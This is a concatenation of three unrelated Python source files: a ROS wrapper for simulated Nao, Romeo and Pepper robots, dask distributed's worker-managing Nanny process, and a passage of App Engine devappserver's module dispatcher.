Class describing a ROS wrapper for the virtual model of Nao, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_nao, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_nao instance
Parameters:
virtual_nao - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_nao,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
if self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP],
self.front_cam_pub,
self.front_info_pub)
if self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM],
self.bottom_cam_pub,
self.bottom_info_pub)
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class RomeoRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Romeo, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_romeo, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_romeo instance
Parameters:
virtual_romeo - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_romeo,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.right_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/image_raw',
Image,
queue_size=10)
self.right_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/right/camera_info',
CameraInfo,
queue_size=10)
self.left_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/image_raw',
Image,
queue_size=10)
self.left_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/left/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT],
self.right_cam_pub,
self.right_info_pub)
if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT],
self.left_cam_pub,
self.left_info_pub)
if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH],
self.depth_cam_pub,
self.depth_info_pub)
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(self, joint_state_publisher)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
class PepperRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Pepper, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_pepper, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_pepper instance
Parameters:
virtual_pepper - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_pepper,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.laser_pub = rospy.Publisher(
self.ros_namespace + "/laser",
LaserScan,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'/naoqi_driver/odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
rospy.Subscriber(
'/cmd_vel',
Twist,
self._velocityCallback)
rospy.Subscriber(
'/move_base_simple/goal',
MovetoPose,
self._moveToCallback)
rospy.Subscriber(
'/move_base_simple/cancel',
Empty,
self._killMoveCallback)
def _broadcastLasers(self, laser_publisher):
"""
INTERNAL METHOD, publishes the laser values in the ROS framework
Parameters:
laser_publisher - The ROS publisher for the LaserScan message,
corresponding to the laser info of the pepper robot (for API
consistency)
"""
if not self.robot.laser_manager.isActive():
return
scan = LaserScan()
scan.header.stamp = rospy.get_rostime()
scan.header.frame_id = "base_footprint"
# -120 degres, 120 degres
scan.angle_min = -2.0944
scan.angle_max = 2.0944
# 240 degres FoV, 61 points (blind zones inc)
scan.angle_increment = (2 * 2.0944) / (15.0 + 15.0 + 15.0 + 8.0 + 8.0)
# Detection ranges for the lasers in meters, 0.1 to 3.0 meters
scan.range_min = 0.1
scan.range_max = 3.0
# Fill the lasers information
right_scan = self.robot.getRightLaserValue()
front_scan = self.robot.getFrontLaserValue()
left_scan = self.robot.getLeftLaserValue()
if isinstance(right_scan, list):
scan.ranges.extend(list(reversed(right_scan)))
scan.ranges.extend([-1]*8)
if isinstance(front_scan, list):
scan.ranges.extend(list(reversed(front_scan)))
scan.ranges.extend([-1]*8)
if isinstance(left_scan, list):
scan.ranges.extend(list(reversed(left_scan)))
laser_publisher.publish(scan)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP],
self.front_cam_pub,
self.front_info_pub)
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM],
self.bottom_cam_pub,
self.bottom_info_pub)
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH],
self.depth_cam_pub,
self.depth_info_pub)
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(
self,
joint_state_publisher,
extra_joints={"WheelFL": 0.0, "WheelFR": 0.0, "WheelB": 0.0})
def _velocityCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/cmd_vel topic
Parameters:
msg - a ROS message containing a Twist command
"""
self.robot.move(msg.linear.x, msg.linear.y, msg.angular.z)
def _moveToCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/goal' topic. It allows to move the robot's base
Parameters:
msg - a ROS message containing a pose stamped with a speed, or a
simple pose stamped (depending on which version of the naoqi_driver
is used, the "official" one from ros-naoqi or the "non official"
softbankrobotics-research fork). The type of the message is the
following: geometry_msgs::PoseStamped for the "official",
naoqi_bridge_msgs::PoseStampedWithSpeed for the "non-official".
An alias is given to the message type: MovetoPose
"""
if OFFICIAL_DRIVER:
pose = msg.pose
frame = 0
frame_id = msg.header.frame_id
speed = None
else:
pose = msg.pose_stamped.pose
frame = msg.referenceFrame
frame_id = msg.pose_stamped.header.frame_id
speed = msg.speed_percentage *\
PepperBaseController.MAX_LINEAR_VELOCITY +\
PepperBaseController.MIN_LINEAR_VELOCITY
try:
assert frame not in [
PepperVirtual.FRAME_ROBOT,
PepperVirtual.FRAME_WORLD]
if frame_id == "odom":
frame = PepperVirtual.FRAME_WORLD
elif frame_id == "base_footprint":
frame = PepperVirtual.FRAME_ROBOT
else:
raise pybullet.error(
"Incorrect reference frame for move_base_simple, please "
"modify the content of your message")
except AssertionError:
pass
x = pose.position.x
y = pose.position.y
theta = pybullet.getEulerFromQuaternion([
pose.orientation.x,
pose.orientation.y,
pose.orientation.z,
pose.orientation.w])[-1]
self.robot.moveTo(
x,
y,
theta,
frame=frame,
speed=speed,
_async=True)
def _killMoveCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/cancel' topic. This callback is used to stop the
robot's base from moving
Parameters:
msg - an empty ROS message, with the Empty type
"""
self.robot.moveTo(0, 0, 0, _async=True)
def _spin(self):
"""
INTERNAL METHOD, designed to emulate a ROS spin method
"""
rate = rospy.Rate(self.frequency)
try:
while not self._wrapper_termination:
rate.sleep()
self._broadcastJointState(self.joint_states_pub)
self._broadcastOdometry(self.odom_pub)
self._broadcastLasers(self.laser_pub)
self._broadcastCamera()
except Exception as e:
print("Stopping the ROS wrapper: " + str(e))
|
nanny.py | from __future__ import print_function, division, absolute_import
from datetime import timedelta
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import dask
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.locks import Event
from .comm import get_address_host, get_local_address_for, unparse_host_port
from .core import rpc, RPCClosed, CommClosedError, coerce_to_address
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (get_ip, mp_context, silence_logging, json_load_robust,
PeriodicCallback)
from .worker import _ncores, run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary.
"""
process = None
status = None
def __init__(self, scheduler_ip=None, scheduler_port=None,
scheduler_file=None, worker_port=0,
ncores=None, loop=None, local_dir=None, services=None,
name=None, memory_limit='auto', reconnect=True,
validate=False, quiet=False, resources=None, silence_logs=None,
death_timeout=None, preload=(), preload_argv=[], security=None,
contact_address=None, listen_address=None, worker_class=None,
**kwargs):
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg['address']
elif scheduler_ip is None and dask.config.get('scheduler-address'):
self.scheduler_addr = dask.config.get('scheduler-address')
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
self._given_worker_port = worker_port
self.ncores = ncores or _ncores
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = death_timeout
self.preload = preload
self.preload_argv = preload_argv
self.Worker = Worker if worker_class is None else worker_class
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get('distributed.worker.memory.terminate')
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args('worker')
self.listen_args = self.security.get_listen_args('worker')
self.local_dir = local_dir
self.loop = loop or IOLoop.current()
self.scheduler = rpc(self.scheduler_addr, connection_args=self.connection_args)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.ncores)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {'instantiate': self.instantiate,
'kill': self.kill,
'restart': self.restart,
# cannot call it 'close' on the rpc side for naming conflict
'terminate': self._close,
'run': self.run}
super(Nanny, self).__init__(handlers, io_loop=self.loop,
connection_args=self.connection_args,
**kwargs)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100, io_loop=self.loop)
self.periodic_callbacks['memory'] = pc
self._listen_address = listen_address
self.status = 'init'
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.ncores)
@gen.coroutine
def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (gen.TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
try:
yield gen.with_timeout(timedelta(seconds=timeout),
self.scheduler.unregister(address=self.worker_address),
quiet_exceptions=allowed_errors)
except allowed_errors:
pass
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@gen.coroutine
def _start(self, addr_or_port=0):
""" Start nanny, start local process, start watching """
# XXX Factor this out
if not addr_or_port:
# Default address is the required one to reach the scheduler
self.listen(get_local_address_for(self.scheduler.address),
listen_args=self.listen_args)
self.ip = get_address_host(self.address)
elif isinstance(addr_or_port, int):
# addr_or_port is an integer => assume TCP
self.ip = get_ip(
get_address_host(self.scheduler.address)
)
self.listen((self.ip, addr_or_port),
listen_args=self.listen_args)
else:
self.listen(addr_or_port, listen_args=self.listen_args)
self.ip = get_address_host(self.address)
logger.info(' Start Nanny at: %r', self.address)
response = yield self.instantiate()
if response == 'running':
assert self.worker_address
self.status = 'running'
else:
yield self._close()
self.start_periodic_callbacks()
def start(self, addr_or_port=0):
self.loop.add_callback(self._start, addr_or_port)
@gen.coroutine
def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
raise gen.Return('OK')
deadline = self.loop.time() + timeout
yield self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
yield self._unregister(deadline - self.loop.time())
@gen.coroutine
def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(host,
self._given_worker_port)
if self.process is None:
self.process = WorkerProcess(
worker_args=(self.scheduler_addr,),
worker_kwargs=dict(ncores=self.ncores,
local_dir=self.local_dir,
services=self.services,
service_ports={'nanny': self.port},
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address),
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit,
worker=self.Worker
)
self.auto_restart = True
if self.death_timeout:
try:
result = yield gen.with_timeout(
timedelta(seconds=self.death_timeout),
self.process.start()
)
except gen.TimeoutError:
yield self._close(timeout=self.death_timeout)
raise gen.Return('timed out')
else:
result = yield self.process.start()
raise gen.Return(result)
@gen.coroutine
def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
@gen.coroutine
def _():
if self.process is not None:
yield self.kill()
yield self.instantiate()
try:
yield gen.with_timeout(timedelta(seconds=timeout), _())
except gen.TimeoutError:
logger.error("Restart timed out, returning before finished")
raise gen.Return('timed out')
else:
raise gen.Return('OK')
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != 'running':
return
process = self.process.process
if process is None:
return
try:
proc = psutil.Process(process.pid)
except psutil.NoSuchProcess:
return
memory = proc.memory_info().rss
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning("Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.status == 'running'
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
@gen.coroutine
def _on_exit(self, exitcode):
if self.status not in ('closing', 'closed'):
try:
yield self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
yield self._close()
return
try:
if self.status not in ('closing', 'closed'):
if self.auto_restart:
logger.warning("Restarting worker")
yield self.instantiate()
except Exception:
logger.error("Failed to restart worker after its process exited",
exc_info=True)
@property
def pid(self):
return self.process and self.process.pid
@gen.coroutine
def _close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status in ('closing', 'closed'):
raise gen.Return('OK')
self.status = 'closing'
logger.info("Closing Nanny at %r", self.address)
self.stop()
try:
if self.process is not None:
yield self.kill(timeout=timeout)
except Exception:
pass
self.process = None
self.rpc.close()
self.scheduler.close_rpc()
self.status = 'closed'
raise gen.Return('OK')
class WorkerProcess(object):
def __init__(self, worker_args, worker_kwargs, worker_start_args,
silence_logs, on_exit, worker):
self.status = 'init'
self.silence_logs = silence_logs
self.worker_args = worker_args
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
@gen.coroutine
def start(self):
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == 'running':
raise gen.Return(self.status)
if self.status == 'starting':
yield self.running.wait()
raise gen.Return(self.status)
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
kwargs=dict(worker_args=self.worker_args,
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid, Worker=self.Worker),
)
self.process.daemon = True
self.process.set_exit_callback(self._on_exit)
self.running = Event()
self.stopped = Event()
self.status = 'starting'
yield self.process.start()
msg = yield self._wait_until_connected(uid)
if not msg:
raise gen.Return(self.status)
self.worker_address = msg['address']
self.worker_dir = msg['dir']
assert self.worker_address
self.status = 'running'
self.running.set()
init_q.close()
raise gen.Return(self.status)
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode,)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode,)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return (self.process.pid
if self.process and self.process.is_alive()
else None)
def mark_stopped(self):
if self.status != 'stopped':
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.warning(msg)
self.status = 'stopped'
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
@gen.coroutine
def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == 'stopped':
return
if self.status == 'stopping':
yield self.stopped.wait()
return
assert self.status in ('starting', 'running')
self.status = 'stopping'
process = self.process
self.child_stop_q.put({
'op': 'stop',
'timeout': max(0, deadline - loop.time()) * 0.8,
'executor_wait': executor_wait,
})
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
yield gen.sleep(0.05)
if process.is_alive():
logger.warning("Worker process still alive after %d seconds, killing",
timeout)
try:
yield process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
@gen.coroutine
def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != 'starting':
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
yield gen.sleep(delay)
continue
if msg['uid'] != uid: # ensure that we didn't cross queues
continue
if 'exception' in msg:
logger.error("Failed while trying to start worker process: %s",
msg['exception'])
yield self.process.join()
raise msg
else:
raise gen.Return(msg)
@classmethod
def _run(cls, worker_args, worker_kwargs, worker_start_args,
silence_logs, init_result_q, child_stop_q, uid, Worker): # pragma: no cover
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(*worker_args, **worker_kwargs)
@gen.coroutine
def do_stop(timeout=5, executor_wait=True):
try:
yield worker._close(report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop('op') == 'stop'
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
@gen.coroutine
def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
yield worker._start(*worker_start_args)
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({'uid': uid, 'exception': e})
init_result_q.close()
else:
assert worker.address
init_result_q.put({'address': worker.address,
'dir': worker.local_dir,
'uid': uid})
init_result_q.close()
yield worker.wait_until_closed()
logger.info("Worker closed")
try:
loop.run_sync(run)
except TimeoutError:
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
pass
|
dispatcher.py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of modules and dispatch requests to them."""
import collections
import logging
import os
import threading
import time
import urlparse
import wsgiref.headers
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import request_info
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import scheduled_executor
from google.appengine.tools.devappserver2 import module
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import wsgi_server
_THREAD_POOL = thread_executor.ThreadExecutor()
ResponseTuple = collections.namedtuple('ResponseTuple',
['status', 'headers', 'content'])
class PortRegistry(object):
def __init__(self):
self._ports = {}
self._ports_lock = threading.RLock()
def add(self, port, _module, inst):
with self._ports_lock:
self._ports[port] = (_module, inst)
def get(self, port):
with self._ports_lock:
return self._ports[port]
class Dispatcher(request_info.Dispatcher):
"""A devappserver2 implementation of request_info.Dispatcher.
In addition to the request_info.Dispatcher interface, it owns modules and
manages their lifetimes.
"""
def __init__(self,
configuration,
host,
port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
module_to_max_instances,
use_mtime_file_watcher,
automatic_restart,
allow_skipped_files,
module_to_threadsafe_override):
"""Initializer for Dispatcher.
Args:
configuration: An application_configuration.ApplicationConfiguration
instance storing the configuration data for the app.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
port: An int specifying the first port where servers should listen.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
module_to_max_instances: A mapping between a module name and the maximum
number of instances that can be created (this overrides the settings
found in the configuration argument) e.g.
{'default': 10, 'backend': 15}.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restart: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
module_to_threadsafe_override: A mapping between the module name and what
to override the module's YAML threadsafe configuration (so modules
not named continue to use their YAML configuration).
"""
self._configuration = configuration
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = None
self._api_port = None
self._running_modules = []
self._module_configurations = {}
self._host = host
self._port = port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._module_name_to_module = {}
self._dispatch_server = None
self._quit_event = threading.Event() # Set when quit() has been called.
self._update_checking_thread = threading.Thread(
target=self._loop_checking_for_updates)
self._module_to_max_instances = module_to_max_instances or {}
self._use_mtime_file_watcher = use_mtime_file_watcher
self._automatic_restart = automatic_restart
self._allow_skipped_files = allow_skipped_files
self._module_to_threadsafe_override = module_to_threadsafe_override
self._executor = scheduled_executor.ScheduledExecutor(_THREAD_POOL)
self._port_registry = PortRegistry()
def start(self, api_port, request_data):
"""Starts the configured modules.
Args:
api_port: The port that APIServer listens for RPC requests on.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
"""
self._api_port = api_port
self._request_data = request_data
port = self._port
self._executor.start()
if self._configuration.dispatch:
self._dispatch_server = wsgi_server.WsgiServer((self._host, port), self)
self._dispatch_server.start()
logging.info('Starting dispatcher running at: http://%s:%s', self._host,
self._dispatch_server.port)
self._update_checking_thread.start()
if port:
port += 100
self._port_registry.add(self._dispatch_server.port, None, None)
for module_configuration in self._configuration.modules:
self._module_configurations[
module_configuration.module_name] = module_configuration
_module, port = self._create_module(module_configuration, port)
_module.start()
self._module_name_to_module[module_configuration.module_name] = _module
logging.info('Starting module "%s" running at: http://%s',
module_configuration.module_name, _module.balanced_address)
@property
def dispatch_port(self):
"""The port that the dispatch HTTP server for the Module is listening on."""
assert self._dispatch_server, 'dispatch server not running'
assert self._dispatch_server.ready, 'dispatch server not ready'
return self._dispatch_server.port
@property
def host(self):
"""The host that the HTTP server for this Dispatcher is listening on."""
return self._host
@property
def dispatch_address(self):
"""The address of the dispatch HTTP server e.g. "localhost:8080"."""
if self.dispatch_port != 80:
return '%s:%s' % (self.host, self.dispatch_port)
else:
return self.host
def _check_for_updates(self):
self._configuration.dispatch.check_for_updates()
def _loop_checking_for_updates(self):
"""Loops until the Dispatcher exits, reloading dispatch.yaml config."""
while not self._quit_event.is_set():
self._check_for_updates()
self._quit_event.wait(timeout=1)
def quit(self):
"""Quits all modules."""
self._executor.quit()
self._quit_event.set()
if self._dispatch_server:
self._dispatch_server.quit()
# AppScale: Prevent instances from serving new requests.
for _module in self._module_name_to_module.values():
with _module.graceful_shutdown_lock:
_module.sigterm_sent = True
